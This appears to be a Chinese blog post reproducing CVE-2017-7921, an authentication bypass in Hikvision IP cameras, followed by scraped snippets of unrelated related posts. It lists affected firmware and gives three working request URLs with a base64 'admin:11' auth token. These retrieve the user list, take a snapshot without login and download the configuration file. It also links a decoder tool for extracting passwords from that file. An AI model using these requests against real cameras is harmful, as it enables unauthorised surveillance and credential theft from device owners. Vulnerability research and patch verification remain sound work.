海康威视CVE-2017-7921

漏洞概述

通过构造url进行检索所有用户、屏幕截图、配置文件下载

漏洞危害等级:中危

影响版本

  • HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

  • 版本至5.4.0build160530版本;

  • DS-2CD2xx0F-ISeries5.2.0build140721

  • 版本至5.4.0Build160401版本;

  • DS-2CD2xx2FWDSeries5.3.1build150410

  • 版本至5.4.4Build161125版本;

  • DS-2CD4x2xFWDSeries5.2.0build140721

  • 版本至5.4.0Build160414版本;

  • DS-2CD4xx5Series5.2.0build140721

  • 版本至5.4.0Build160421版本;

  • DS-2DFxSeries5.2.0build140805

  • 版本至5.4.5Build160928版本;

  • DS-2CD63xxSeries5.0.9build140305

  • 版本至5.3.5Build160106版本

监控查看环境

组件 版本
os win7
web IE

漏洞复现

命令:
IP/Security/users?auth=YWRtaW46MTEK
检索所有用户
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
获取镜头快照而不进行身份验证
IP/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头二进制配置文件

上述内容中的简单解释:

YWRtaW46MTEK
admin:11的base64编码

onvif-http/snapshot
协议截图指令

信息提取

得到二进制配置文件:configurationFile
配置文件解码器可以提取关键密码

相关工具快捷通道:https://download.csdn.net/download/qq_46527139/13655171

海康威视CVE-2017-7921相关推荐

  1. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  2. php cve 2017 12933,18-017 (March 27, 2018)

    描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...

  3. 2021年第一季度Sumap网络空间测绘CVE漏洞趋势安全分析报告

    前言 本文主要通过网络测绘角度收集各种资产协议的版本号信息,通过比对CVE漏洞影响范围中的版本号方式,进行安全风险趋势分析,无任何实际危害互联网行为.资产在携带版本中也会存在修复补丁后版本不变的情况. ...

  4. Nginx平滑升级到最新版本

    (一)简述: 早上收到nginx最新漏洞的通知,Nginx官方发布最新的安全公告,在Nginx范围过滤器中发现了一个安全问题(CVE-2017-7529),通过精心构造的恶意请求可能会导致整数溢出并且 ...

  5. VMware vCenter Server Appliance Photon OS安全修补程序

    VMware vCenter Server Appliance Photon OS安全修补程序 上次更新时间 2019年12月19日 https://docs.vmware.com/en/VMware ...

  6. 工控系统的全球安全现状:全球漏洞实例分析

    工控系统的全球安全现状:全球漏洞实例分析 一.摘要 ​ 运营技术(OT).网络和设备,即工业环境中使用的所有组件,在设计时并未考虑到安全性.效率和易用性是最重要的设计特征,然而,由于工业的数字化,越来 ...

  7. 股票深度分析,深度诊断股票

    深度学习做股票预测靠谱吗 . 靠谱,但是前提是你所学习的技术分析筹码分析知识是正确的那些,而不是买书买教材或者网上找资料学到的那些,比如kdj指标,无论你在哪本书或者网上找的资料都会告诉你80以上死叉 ...

  8. 宏观视角下的office漏洞(2010-2018)

    奇技指南 本文作者银雁冰:360高级威胁应对团队·高级威胁自动化组 本文来自安全客,原文地址: https://www.anquanke.com/post/id/180067 前 言  本文是对我在B ...

  9. 海康威视2017校园秋季招聘技术支持工程师面试经验

    面试单位:杭州海康威视数字技术股份有限公司 面试岗位:技术支持工程师 面试时间:2017年10月22日下午 面试地点:本校 面试过程: 先询问了我一些基本的家庭状况,算是缓和下面试的气氛. 紧接着开始 ...

  10. 海康威视2017软件精英挑战赛初赛题目

    题目概述 在车库中安排若干泊车机器人,根据给定的车位地图,合理优化机器人的数量及其运动路径,尽量减少客户在停车和取车中的等待时间,并使总成本最小.(试题用例包于5月初开放下载) 参数设定 为了简化问题 ...

最新文章

  1. LINUX 操作记录到syslog,并发送到syslog服务器上
  2. RESTful API 设计指南[转]
  3. 计算机组成加速比例题,计算机体系结构大题预测
  4. linux终端输出图形_Linux进程关系
  5. 节点本地范围和链路本地范围_微服务链路追踪——skywalking
  6. java代码抖音舞,java实现抖音代码舞源码
  7. 为什么CSDN登陆是明文传输账户密码
  8. abb的knx的数据库下载方法_ABB i-bus KNX系统节能方案
  9. ubuntu安装deep-wine下载qq,tim等文件
  10. 《大型网站技术架构:核心原理与案例分析李智慧》pdf版电子书网盘附下载链接+仪式感技术书阅读法
  11. android tf卡 修复工具,sd卡修复工具大师
  12. 笔记本计算机bios设置,教你笔记本电脑如何进入bios界面
  13. 我的2023届秋招之旅
  14. 一个函数能否被两个线程同时调用
  15. 热敏打印机数据截取+追加打印二维码
  16. 用JAVA awt实现Image Asset Studio生成圆形或圆角矩形图片功能
  17. 戴尔服务器T30不读硬盘,【戴尔 POWEREDGE T30服务器开箱展示】硬盘|散热|机箱|内存_摘要频道_什么值得买...
  18. 酒水行业数字化转型解决方案
  19. jav阶段性总结(-5)
  20. PIC单片机开发环境搭建_MPLAB X IDE安装步骤

热门文章

  1. studio gradle中 Read timed out
  2. 程序员通病腰肌劳损,快速有效疗法--凳子小燕飞
  3. td340服务器网页,thinkserver TD340服务器系统用户手册V1.0_5分享文库
  4. IBM Cloud Classic VSI Storage性能测试
  5. 水泥cement英语里也写作caement
  6. 中国蚁剑AntSword
  7. oracle oui gi是什么,【翻译自mos文章】在windows 2012上安装rac时,GI 的安装失败,报OUI-35024...
  8. SCOM 简单安装指南 [SCOM中文系列之二]
  9. 【声明】RUC自习助手APP(Android版)已上线,可下载
  10. Android 7.0 OTA升级(高通)